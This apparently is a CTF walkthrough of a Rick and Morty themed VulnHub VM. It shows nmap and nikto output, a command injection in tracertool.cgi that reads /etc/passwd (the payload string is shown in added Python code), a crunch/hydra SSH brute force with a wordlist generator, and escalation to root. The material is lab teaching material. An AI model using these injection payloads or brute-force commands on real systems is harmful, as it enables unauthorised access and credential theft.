Back again with another VulnHub challenge, this time a Rick and Morty themed one. The description of the challenge states that there are 130 points worth of flags and that you should also get root, so I presume you'll need root to get the last flag. Being a fan of the show, I felt that I had to beat this one, so let's get started.
As per usual, let's fire up nmap and scan the VM.
Nmap scan
# Nmap 7.60 scan initiated Tue Nov 7 02:28:55 2017 as: nmap -p- -sSVC -O -oA nmap 192.168.1.36
Nmap scan report for 192.168.1.36
Host is up (0.00032s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.35
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp open http Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty’s Website
9090/tcp open http Cockpit web service
|_http-title: Did not follow redirect to https://192.168.1.36:9090/
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
| 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open unknown
| fingerprint-strings:
| NULL, ibm-db2:
|_ Welcome to Ricks half baked reverse shell…
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=11/7%Time=5A0178AF%P=x86_64-pc-linux-gnu%r(NULL
SF:,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4
SF:\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=11/7%Time=5A0178AF%P=x86_64-pc-linux-gnu%r(N
SF:ULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=11/7%Time=5A0178B5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.
SF:\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20re
SF:verse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 7 04:11:54 2017 -- 1 IP address (1 host up) scanned in 6180.25 seconds
Looking through the output, the first flag is right there for you: the unknown service on port 13337 hands it over in its banner.
FLAG:{TheyFoundMyBackDoorMorty}-10Points (10/130).
There's also a backdoor on port 60000 (the "half baked reverse shell" banner, which already ends in a "# " prompt) and a Cockpit web console on port 9090, which nmap reports as redirecting to HTTPS. I'll save these for later.
A visit to the website on port 80 gave a simple webpage. I downloaded the image and checked the page source for clues but found nothing.
So let's take a look at the Cockpit site on port 9090.
Sweet, that makes flag 2 (20/130). I poked around a bit more but found nothing.
Moving on, I fired up enum4linux, which gave me nothing, but nikto found some interesting directories and files.
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.1.36
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OPTIONS Allowed HTTP Methods: GET, POST, OPTIONS, HEAD, TRACE
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: GET /passwords/: Directory indexing found.
+ OSVDB-3092: GET /passwords/: This might be interesting…
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
Hmmm, I wonder what's in the passwords directory?
Diving into the FLAG.txt file gives us:
That makes 30/130 points. Going back and looking at the password.html source produced my next clue. Hidden in the source was the password winter, possibly a login for Morty?
I searched around a bit more, then decided to go over my nmap scan again to see what else is open: FTP, SSH and the reverse shell. Note that port 22 only returns an Ubuntu welcome banner with no SSH host keys; the real OpenSSH 7.5 daemon is on port 22222, so that is where any SSH login attempts need to go. Let's go with FTP first, as anonymous login is enabled and the listing already shows a FLAG.txt.
Downloading the FLAG.txt file to my machine gave me the flag:
making it 40/130 points.
Before attacking SSH I decided to go after the reverse shell on port 60000; connecting to it drops you straight at the "# " prompt the nmap fingerprint showed.
That's another flag, 50/130 points.
I tried to SSH in as morty and kept getting denied, so I decided to look around for some usernames and came across the robots.txt file.
Looking at the root_shell.cgi page gave me nothing.
However, the tracertool.cgi page definitely gave me something. It takes an IP address and runs traceroute against it, which means that if the input is concatenated into the shell command, the page is vulnerable to command injection. Appending a second command after a shell separator, and
boom, the passwd file. Here we have a couple of users to try over SSH now: Morty, Summer and RickSanchez.
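To make the tracertool.cgi bug concrete, here is an added example (mine, not code from the VM or from the original write-up) that models the vulnerable pattern beside a hardened one. The CGI's real implementation is not on the page, so the vulnerable function is an assumption about its shape: user input concatenated into a string that a shell parses. The injected target string is constructed for the demo.

```python
import ipaddress
import subprocess
from typing import List, Optional

# Characters that /bin/sh treats as command separators or substitutions.
# Any one of these in user input means the "single argument" became a script.
SHELL_META = set(";|&$`\n()<>")

# Constructed payload in the shape used against tracertool.cgi:
# a legitimate-looking target followed by a separator and a second command.
INJECTED_TARGET = "127.0.0.1; cat /etc/passwd"


def vulnerable_command(target: str) -> str:
    """Assumed model of the broken CGI: the string it would hand to
    os.system() / `sh -c`. The shell sees two commands, so the attacker's
    command runs as the web server user."""
    return "traceroute " + target


def contains_shell_meta(target: str) -> bool:
    """True if the input could change the command structure under sh -c."""
    return any(ch in SHELL_META for ch in target)


def validate_target(target: str) -> Optional[str]:
    """Allow-list check: accept only a syntactically valid IPv4/IPv6 literal
    and return its canonical form; everything else is rejected."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def hardened_argv(target: str) -> Optional[List[str]]:
    """Hardened form: validated input becomes one argv element and no shell
    is involved, so metacharacters carry no meaning."""
    ip = validate_target(target)
    if ip is None:
        return None
    return ["traceroute", "-n", ip]


def run_traceroute(target: str) -> int:
    """Run the hardened command. Returns the process exit code, or 1 when
    the input is rejected (a real CGI would answer 400 at that point)."""
    argv = hardened_argv(target)
    if argv is None:
        return 1
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    print("shell would run :", vulnerable_command(INJECTED_TARGET))
    print("metacharacters  :", contains_shell_meta(INJECTED_TARGET))
    print("hardened argv   :", hardened_argv(INJECTED_TARGET))
```

The allow-list on the IP literal is what matters; a deny-list of metacharacters (contains_shell_meta) is useful as a detection signal in logs but should not be the only control, since shells have more separators than any list you remember.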
Logged in as Summer, I tried using cat on the flag, but the creator decided to troll us and give us ASCII art instead (not that I'm mad).
So back to using the head command, and flag 60/130.
Searching around, I found some interesting files in the home directories of Morty and RickSanchez. I ended up downloading them to my PC to inspect them and do what I needed to do.
I started with Morty's directory. The Safe_Password.jpg file seemed interesting: exiftool found nothing, but strings came through with:
Extracting the journal with the password gave me a text file.
Flag points 80/130. The journal mentions something about a safe and that the password is 131333. Checking out Rick's directory, I find two other folders, RICKS_SAFE and ThisDoesntContainAnyFlags. Naturally, I go after the ThisDoesntContainAnyFlags directory and, behold, he was right:
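Why did exiftool miss the password in Safe_Password.jpg while strings found it? Text appended after a JPEG's end-of-image marker is outside every segment a metadata parser reads. The following added example (mine, not from the original post) reimplements the relevant part of strings and then narrows it to data past the EOI marker; the JPEG bytes and the hidden note are constructed stand-ins, not the real file or the real password.

```python
import re
from typing import List

# Constructed stand-in for Safe_Password.jpg: a minimal JPEG skeleton
# (SOI, one APP0/JFIF segment, a few junk bytes, EOI) with text appended
# after the end-of-image marker. Viewers and exiftool stop at EOI, so the
# text is invisible to them but `strings` prints it. The note is made up.
HIDDEN_NOTE = b"hypothetical safe password: not-the-real-one"
SAMPLE_JPEG = (
    b"\xff\xd8"                          # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01"  # APP0 marker, length 16, JFIF id
    b"\x00\x00\x01\x00\x01\x00\x00"      # units, density, thumbnail size
    b"\x00\x01\x02\x03"                  # junk standing in for image data
    b"\xff\xd9"                          # EOI
    + HIDDEN_NOTE
)


def find_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Equivalent of `strings -n min_len`: every run of printable ASCII."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def trailing_data(jpeg: bytes) -> bytes:
    """Bytes after the last EOI marker (FF D9), where appended text lives.
    Returns b"" if the file ends at EOI or has no EOI at all."""
    idx = jpeg.rfind(b"\xff\xd9")
    if idx == -1:
        return b""
    return jpeg[idx + 2:]


def strings_after_eoi(jpeg: bytes, min_len: int = 4) -> List[str]:
    """The strings worth reading first: those hidden past the image's end."""
    return find_strings(trailing_data(jpeg), min_len)


if __name__ == "__main__":
    print("all strings      :", find_strings(SAMPLE_JPEG))
    print("after EOI marker :", strings_after_eoi(SAMPLE_JPEG))
```

On a real image the full strings output is noisy (JFIF and Exif identifiers, Huffman tables that happen to be printable), so checking for trailing data after FF D9 is the quicker triage step; a file with anything non-trivial there has been appended to.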
Basically got trolled.
Now on to the safe. I couldn't execute it on my computer, so I SSHed back in and copied it into Summer's directory. Running the file got me trolled again; running it a second time with the password as an argument:
Now on 100/130 points. The file states that Rick's password is one upper-case letter and one number plus one of the words from his old band. It turns out Rick was in a band, the Flesh Curtains. I used crunch to generate the password files and hydra to brute-force SSH (on port 22222, not 22) with the username RickSanchez.
Password: P7Curtains.
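The keyspace here is small enough to enumerate exactly, which is the point of reading the hint rather than reaching for rockyou. As an added example (mine, not the crunch/hydra invocation from the write-up), the generator below builds the same wordlist in Python. It goes slightly beyond the text in one respect: because the hint does not say whether the letter or the digit comes first, it keeps both orders, which only doubles the list.

```python
import itertools
import string
from typing import List

# Constraints from the safe's output: one upper-case letter, one digit, and
# a word from the band name. "Flesh Curtains" gives two candidate words.
BAND_WORDS = ["Flesh", "Curtains"]


def generate_candidates(words: List[str] = BAND_WORDS) -> List[str]:
    """Enumerate every password matching the pattern, letter-first and
    digit-first: 26 letters * 10 digits * 2 orders * len(words) entries
    (1040 for the two words above)."""
    out = []
    for letter, digit in itertools.product(string.ascii_uppercase, string.digits):
        for word in words:
            out.append(letter + digit + word)   # e.g. P7Curtains
            out.append(digit + letter + word)   # e.g. 7PCurtains
    return out


def write_wordlist(path: str, words: List[str] = BAND_WORDS) -> int:
    """Write one candidate per line, the format hydra's -P expects.
    Returns the number of lines written."""
    candidates = generate_candidates(words)
    with open(path, "w") as fh:
        fh.write("\n".join(candidates) + "\n")
    return len(candidates)


if __name__ == "__main__":
    count = write_wordlist("rick_wordlist.txt")  # hypothetical output path
    print(count, "candidates written to rick_wordlist.txt")
```

The crunch equivalents for the letter-first order are `crunch 7 7 -t ,%Flesh` and `crunch 10 10 -t ,%Curtains` (in crunch's -t syntax `,` is an upper-case letter and `%` a digit). Feeding the list to hydra against the real SSH port looks like `hydra -l RickSanchez -P rick_wordlist.txt -s 22222 -t 4 ssh://192.168.1.36`; the `-t 4` keeps the parallel connections under the limit most sshd configurations enforce, which otherwise produces false negatives.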
Now SSH into the machine as RickSanchez. Let's see what rights Rick has:
He has all the rights. Switch to root and boom, final flag 130/130 points.
Overall, I really liked this CTF and actually learnt something (the author must really like Rick and Morty to know Rick was in a band). I hope we get more in the future that are more challenging.